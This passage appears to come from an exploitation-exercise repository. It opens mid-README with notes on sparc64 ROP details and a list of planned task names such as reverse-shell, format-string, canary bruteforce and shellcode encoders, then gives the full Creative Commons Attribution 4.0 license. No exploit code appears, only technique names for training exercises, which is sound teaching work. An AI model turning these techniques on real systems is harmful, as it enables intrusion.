`sparc64` has stack bias of 2047 bytes. 300 | 301 | 3. `sparc64` CPU used by QEMU has 8 register windows. 302 | 303 | 4. Figure out why and when `vulnerable()` register window gets loaded from the stack, none of the linked ROP tutorials mention it :) 304 | 305 | 306 | ## Someday 307 | 308 | Some ideas for more tasks: 309 | 310 | XX-dup2-rop, 311 | XX-aaw-rop, 312 | XX-format-string, 313 | XX-reverse-shell, 314 | XX-oneshot-write, 315 | XX-oneshot-syscall, 316 | XX-bruteforce-aslr, 317 | XX-bruteforce-canary, 318 | XX-overwrite-got, 319 | XX-partial-ret, 320 | XX-partial-got, 321 | XX-sleep-shellcode, 322 | XX-mprotect-shellcode, 323 | XX-nonull-shellcode, 324 | XX-alphanum-shellcode, 325 | XX-shellcode-encoder, 326 | XX-nop-sled, 327 | XX-ret-sled, 328 | XX-canary-master, 329 | XX-canary-leak, 330 | XX-magic-gadget, 331 | XX-stack-pivot, 332 | XX-egghunt 333 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Attribution 4.0 International 2 | 3 | ======================================================================= 4 | 5 | Creative Commons Corporation ("Creative Commons") is not a law firm and 6 | does not provide legal services or legal advice. Distribution of 7 | Creative Commons public licenses does not create a lawyer-client or 8 | other relationship. Creative Commons makes its licenses and related 9 | information available on an "as-is" basis. Creative Commons gives no 10 | warranties regarding its licenses, any material licensed under their 11 | terms and conditions, or any related information. Creative Commons 12 | disclaims all liability for damages resulting from their use to the 13 | fullest extent possible. 14 | 15 | Using Creative Commons Public Licenses 16 | 17 | Creative Commons public licenses provide a standard set of terms and 18 | conditions that creators and other rights holders may use to share 19 | original works of authorship and other material subject to copyright 20 | and certain other rights specified in the public license below. The 21 | following considerations are for informational purposes only, are not 22 | exhaustive, and do not form part of our licenses. 23 | 24 | Considerations for licensors: Our public licenses are 25 | intended for use by those authorized to give the public 26 | permission to use material in ways otherwise restricted by 27 | copyright and certain other rights. Our licenses are 28 | irrevocable. Licensors should read and understand the terms 29 | and conditions of the license they choose before applying it. 30 | Licensors should also secure all rights necessary before 31 | applying our licenses so that the public can reuse the 32 | material as expected. Licensors should clearly mark any 33 | material not subject to the license. This includes other CC- 34 | licensed material, or material used under an exception or 35 | limitation to copyright. More considerations for licensors: 36 | wiki.creativecommons.org/Considerations_for_licensors 37 | 38 | Considerations for the public: By using one of our public 39 | licenses, a licensor grants the public permission to use the 40 | licensed material under specified terms and conditions. If 41 | the licensor's permission is not necessary for any reason--for 42 | example, because of any applicable exception or limitation to 43 | copyright--then that use is not regulated by the license. Our 44 | licenses grant only permissions under copyright and certain 45 | other rights that a licensor has authority to grant. Use of 46 | the licensed material may still be restricted for other 47 | reasons, including because others have copyright or other 48 | rights in the material. A licensor may make special requests, 49 | such as asking that all changes be marked or described. 50 | Although not required by our licenses, you are encouraged to 51 | respect those requests where reasonable. More considerations 52 | for the public: 53 | wiki.creativecommons.org/Considerations_for_licensees 54 | 55 | ======================================================================= 56 | 57 | Creative Commons Attribution 4.0 International Public License 58 | 59 | By exercising the Licensed Rights (defined below), You accept and agree 60 | to be bound by the terms and conditions of this Creative Commons 61 | Attribution 4.0 International Public License ("Public License"). To the 62 | extent this Public License may be interpreted as a contract, You are 63 | granted the Licensed Rights in consideration of Your acceptance of 64 | these terms and conditions, and the Licensor grants You such rights in 65 | consideration of benefits the Licensor receives from making the 66 | Licensed Material available under these terms and conditions. 67 | 68 | 69 | Section 1 -- Definitions. 70 | 71 | a. Adapted Material means material subject to Copyright and Similar 72 | Rights that is derived from or based upon the Licensed Material 73 | and in which the Licensed Material is translated, altered, 74 | arranged, transformed, or otherwise modified in a manner requiring 75 | permission under the Copyright and Similar Rights held by the 76 | Licensor. For purposes of this Public License, where the Licensed 77 | Material is a musical work, performance, or sound recording, 78 | Adapted Material is always produced where the Licensed Material is 79 | synched in timed relation with a moving image. 80 | 81 | b. Adapter's License means the license You apply to Your Copyright 82 | and Similar Rights in Your contributions to Adapted Material in 83 | accordance with the terms and conditions of this Public License. 84 | 85 | c. Copyright and Similar Rights means copyright and/or similar rights 86 | closely related to copyright including, without limitation, 87 | performance, broadcast, sound recording, and Sui Generis Database 88 | Rights, without regard to how the rights are labeled or 89 | categorized. For purposes of this Public License, the rights 90 | specified in Section 2(b)(1)-(2) are not Copyright and Similar 91 | Rights. 92 | 93 | d. Effective Technological Measures means those measures that, in the 94 | absence of proper authority, may not be circumvented under laws 95 | fulfilling obligations under Article 11 of the WIPO Copyright 96 | Treaty adopted on December 20, 1996, and/or similar international 97 | agreements. 98 | 99 | e. Exceptions and Limitations means fair use, fair dealing, and/or 100 | any other exception or limitation to Copyright and Similar Rights 101 | that applies to Your use of the Licensed Material. 102 | 103 | f. Licensed Material means the artistic or literary work, database, 104 | or other material to which the Licensor applied this Public 105 | License. 106 | 107 | g. Licensed Rights means the rights granted to You subject to the 108 | terms and conditions of this Public License, which are limited to 109 | all Copyright and Similar Rights that apply to Your use of the 110 | Licensed Material and that the Licensor has authority to license. 111 | 112 | h. Licensor means the individual(s) or entity(ies) granting rights 113 | under this Public License. 114 | 115 | i. Share means to provide material to the public by any means or 116 | process that requires permission under the Licensed Rights, such 117 | as reproduction, public display, public performance, distribution, 118 | dissemination, communication, or importation, and to make material 119 | available to the public including in ways that members of the 120 | public may access the material from a place and at a time 121 | individually chosen by them. 122 | 123 | j. Sui Generis Database Rights means rights other than copyright 124 | resulting from Directive 96/9/EC of the European Parliament and of 125 | the Council of 11 March 1996 on the legal protection of databases, 126 | as amended and/or succeeded, as well as other essentially 127 | equivalent rights anywhere in the world. 128 | 129 | k. You means the individual or entity exercising the Licensed Rights 130 | under this Public License. Your has a corresponding meaning. 131 | 132 | 133 | Section 2 -- Scope. 134 | 135 | a. License grant. 136 | 137 | 1. Subject to the terms and conditions of this Public License, 138 | the Licensor hereby grants You a worldwide, royalty-free, 139 | non-sublicensable, non-exclusive, irrevocable license to 140 | exercise the Licensed Rights in the Licensed Material to: 141 | 142 | a. reproduce and Share the Licensed Material, in whole or 143 | in part; and 144 | 145 | b. produce, reproduce, and Share Adapted Material. 146 | 147 | 2. Exceptions and Limitations. For the avoidance of doubt, where 148 | Exceptions and Limitations apply to Your use, this Public 149 | License does not apply, and You do not need to comply with 150 | its terms and conditions. 151 | 152 | 3. Term. The term of this Public License is specified in Section 153 | 6(a). 154 | 155 | 4. Media and formats; technical modifications allowed. The 156 | Licensor authorizes You to exercise the Licensed Rights in 157 | all media and formats whether now known or hereafter created, 158 | and to make technical modifications necessary to do so. The 159 | Licensor waives and/or agrees not to assert any right or 160 | authority to forbid You from making technical modifications 161 | necessary to exercise the Licensed Rights, including 162 | technical modifications necessary to circumvent Effective 163 | Technological Measures. For purposes of this Public License, 164 | simply making modifications authorized by this Section 2(a) 165 | (4) never produces Adapted Material. 166 | 167 | 5. Downstream recipients. 168 | 169 | a. Offer from the Licensor -- Licensed Material. Every 170 | recipient of the Licensed Material automatically 171 | receives an offer from the Licensor to exercise the 172 | Licensed Rights under the terms and conditions of this 173 | Public License. 174 | 175 | b. No downstream restrictions. You may not offer or impose 176 | any additional or different terms or conditions on, or 177 | apply any Effective Technological Measures to, the 178 | Licensed Material if doing so restricts exercise of the 179 | Licensed Rights by any recipient of the Licensed 180 | Material. 181 | 182 | 6. No endorsement. Nothing in this Public License constitutes or 183 | may be construed as permission to assert or imply that You 184 | are, or that Your use of the Licensed Material is, connected 185 | with, or sponsored, endorsed, or granted official status by, 186 | the Licensor or others designated to receive attribution as 187 | provided in Section 3(a)(1)(A)(i). 188 | 189 | b. Other rights. 190 | 191 | 1. Moral rights, such as the right of integrity, are not 192 | licensed under this Public License, nor are publicity, 193 | privacy, and/or other similar personality rights; however, to 194 | the extent possible, the Licensor waives and/or agrees not to 195 | assert any such rights held by the Licensor to the limited 196 | extent necessary to allow You to exercise the Licensed 197 | Rights, but not otherwise. 198 | 199 | 2. Patent and trademark rights are not licensed under this 200 | Public License. 201 | 202 | 3. To the extent possible, the Licensor waives any right to 203 | collect royalties from You for the exercise of the Licensed 204 | Rights, whether directly or through a collecting society 205 | under any voluntary or waivable statutory or compulsory 206 | licensing scheme. In all other cases the Licensor expressly 207 | reserves any right to collect such royalties. 208 | 209 | 210 | Section 3 -- License Conditions. 211 | 212 | Your exercise of the Licensed Rights is expressly made subject to the 213 | following conditions. 214 | 215 | a. Attribution. 216 | 217 | 1. If You Share the Licensed Material (including in modified 218 | form), You must: 219 | 220 | a. retain the following if it is supplied by the Licensor 221 | with the Licensed Material: 222 | 223 | i. identification of the creator(s) of the Licensed 224 | Material and any others designated to receive 225 | attribution, in any reasonable manner requested by 226 | the Licensor (including by pseudonym if 227 | designated); 228 | 229 | ii. a copyright notice; 230 | 231 | iii. a notice that refers to this Public License; 232 | 233 | iv. a notice that refers to the disclaimer of 234 | warranties; 235 | 236 | v. a URI or hyperlink to the Licensed Material to the 237 | extent reasonably practicable; 238 | 239 | b. indicate if You modified the Licensed Material and 240 | retain an indication of any previous modifications; and 241 | 242 | c. indicate the Licensed Material is licensed under this 243 | Public License, and include the text of, or the URI or 244 | hyperlink to, this Public License. 245 | 246 | 2. You may satisfy the conditions in Section 3(a)(1) in any 247 | reasonable manner based on the medium, means, and context in 248 | which You Share the Licensed Material. For example, it may be 249 | reasonable to satisfy the conditions by providing a URI or 250 | hyperlink to a resource that includes the required 251 | information. 252 | 253 | 3. If requested by the Licensor, You must remove any of the 254 | information required by Section 3(a)(1)(A) to the extent 255 | reasonably practicable. 256 | 257 | 4. If You Share Adapted Material You produce, the Adapter's 258 | License You apply must not prevent recipients of the Adapted 259 | Material from complying with this Public License. 260 | 261 | 262 | Section 4 -- Sui Generis Database Rights. 263 | 264 | Where the Licensed Rights include Sui Generis Database Rights that 265 | apply to Your use of the Licensed Material: 266 | 267 | a. for the avoidance of doubt, Section 2(a)(1) grants You the right 268 | to extract, reuse, reproduce, and Share all or a substantial 269 | portion of the contents of the database; 270 | 271 | b. if You include all or a substantial portion of the database 272 | contents in a database in which You have Sui Generis Database 273 | Rights, then the database in which You have Sui Generis Database 274 | Rights (but not its individual contents) is Adapted Material; and 275 | 276 | c. You must comply with the conditions in Section 3(a) if You Share 277 | all or a substantial portion of the contents of the database. 278 | 279 | For the avoidance of doubt, this Section 4 supplements and does not 280 | replace Your obligations under this Public License where the Licensed 281 | Rights include other Copyright and Similar Rights. 282 | 283 | 284 | Section 5 -- Disclaimer of Warranties and Limitation of Liability. 285 | 286 | a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE 287 | EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS 288 | AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF 289 | ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS, 290 | IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION, 291 | WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR 292 | PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS, 293 | ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT 294 | KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT 295 | ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU. 296 | 297 | b. TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE 298 | TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION, 299 | NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT, 300 | INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES, 301 | COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR 302 | USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN 303 | ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR 304 | DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR 305 | IN PART, THIS LIMITATION MAY NOT APPLY TO YOU. 306 | 307 | c. The disclaimer of warranties and limitation of liability provided 308 | above shall be interpreted in a manner that, to the extent 309 | possible, most closely approximates an absolute disclaimer and 310 | waiver of all liability. 311 | 312 | 313 | Section 6 -- Term and Termination. 314 | 315 | a. This Public License applies for the term of the Copyright and 316 | Similar Rights licensed here. However, if You fail to comply with 317 | this Public License, then Your rights under this Public License 318 | terminate automatically. 319 | 320 | b. Where Your right to use the Licensed Material has terminated under 321 | Section 6(a), it reinstates: 322 | 323 | 1. automatically as of the date the violation is cured, provided 324 | it is cured within 30 days of Your discovery of the 325 | violation; or 326 | 327 | 2. upon express reinstatement by the Licensor. 328 | 329 | For the avoidance of doubt, this Section 6(b) does not affect any 330 | right the Licensor may have to seek remedies for Your violations 331 | of this Public License. 332 | 333 | c. For the avoidance of doubt, the Licensor may also offer the 334 | Licensed Material under separate terms or conditions or stop 335 | distributing the Licensed Material at any time; however, doing so 336 | will not terminate this Public License. 337 | 338 | d. Sections 1, 5, 6, 7, and 8 survive termination of this Public 339 | License. 340 | 341 | 342 | Section 7 -- Other Terms and Conditions. 343 | 344 | a. The Licensor shall not be bound by any additional or different 345 | terms or conditions communicated by You unless expressly agreed. 346 | 347 | b. Any arrangements, understandings, or agreements regarding the 348 | Licensed Material not stated herein are separate from and 349 | independent of the terms and conditions of this Public License. 350 | 351 | 352 | Section 8 -- Interpretation. 353 | 354 | a. For the avoidance of doubt, this Public License does not, and 355 | shall not be interpreted to, reduce, limit, restrict, or impose 356 | conditions on any use of the Licensed Material that could lawfully 357 | be made without permission under this Public License. 358 | 359 | b. To the extent possible, if any provision of this Public License is 360 | deemed unenforceable, it shall be automatically reformed to the 361 | minimum extent necessary to make it enforceable. If the provision 362 | cannot be reformed, it shall be severed from this Public License 363 | without affecting the enforceability of the remaining terms and 364 | conditions. 365 | 366 | c. No term or condition of this Public License will be waived and no 367 | failure to comply consented to unless expressly agreed to by the 368 | Licensor. 369 | 370 | d. Nothing in this Public License constitutes or may be interpreted 371 | as a limitation upon, or waiver of, any privileges and immunities 372 | that apply to the Licensor or You, including from the legal 373 | processes of any jurisdiction or authority. 374 | 375 | 376 | ======================================================================= 377 | 378 | Creative Commons is not a party to its public licenses. 379 | Notwithstanding, Creative Commons may elect to apply one of its public 380 | licenses to material it publishes and in those instances will be 381 | considered the “Licensor.” The text of the Creative Commons public 382 | licenses is dedicated to the public domain under the CC0 Public Domain 383 | Dedication. Except for the limited purpose of indicating that material 384 | is shared under a Creative Commons public license or as otherwise 385 | permitted by the Creative Commons policies published at 386 | creativecommons.org/policies, Creative Commons does not authorize the 387 | use of the trademark "Creative Commons" or any other trademark or logo 388 | of Creative Commons without its prior written consent including, 389 | without limitation, in connection with any unauthorized modifications 390 | to any of its public licenses or any other arrangements, 391 | understandings, or agreements concerning use of licensed material. For 392 | the avoidance of doubt, this paragraph does not form part of the public 393 | licenses. 394 | 395 | Creative Commons may be contacted at creativecommons.org. 396 | --------------------------------------------------------------------------------